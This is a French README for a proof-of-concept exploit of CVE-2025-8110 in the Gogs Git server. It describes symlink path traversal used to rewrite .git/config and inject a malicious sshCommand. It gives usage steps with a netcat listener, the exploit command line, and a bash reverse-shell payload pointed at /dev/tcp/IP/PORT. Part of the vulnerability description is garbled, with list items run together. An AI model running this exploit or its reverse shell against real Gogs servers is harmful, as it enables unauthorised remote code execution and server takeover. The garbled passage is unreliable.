
Preuve de concept d'exploitation pour CVE-2025-8110, une vulnérabilité RCE dans Gogs exploitant un traversée de chemin via des liens symboliques et une injection sshCommand pour délivrer un shell inversé.
Un Proof of Concept (PoC) pour CVE-2025-8110, une vulnérabilité critique dans Gogs qui permet l'exécution de code à distance (RCE) via la manipulation de .git/config en utilisant des contournements de liens symboliques et l'injection de sshCommand.
Cet exploit cible une faille de traversée de chemin dans la gestion de contenu de l'API Gogs. Un utilisateur authentifié peut :
.git/config interne.sshCommand malveillant pour exécuter un lorsque le serveur effectue des opérations Git.!, @).Rich.git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
Installez les dépendances :
pip3 install -r requirements.txt
💻 Utilisation
Démarrez votre listener :
nc -lvnp 6666
Exécutez l'exploit :
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'
Arguments :
| Argument | Description |
|---|---|
-u, --url | URL de base de l'instance Gogs cible (ex. http://target.htb:3000). |
-lh, --host | IP de l'attaquant (LHOST) vers laquelle le reverse shell se connectera. |
-lp, --port | Port du listener (LPORT) configuré sur votre machine. |
-p, --password | Mot de passe du compte pwnuser pour effectuer l'authentification. |
-x, --proxy | (Optionnel) Route le trafic via un proxy local (défaut : http://localhost:8080). |
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
Lorsque Gogs exécute une commande Git nécessitant un transport réseau (comme une synchronisation miroir ou une vérification de référence interne), il invoque le sshCommand, déclenchant le reverse shell.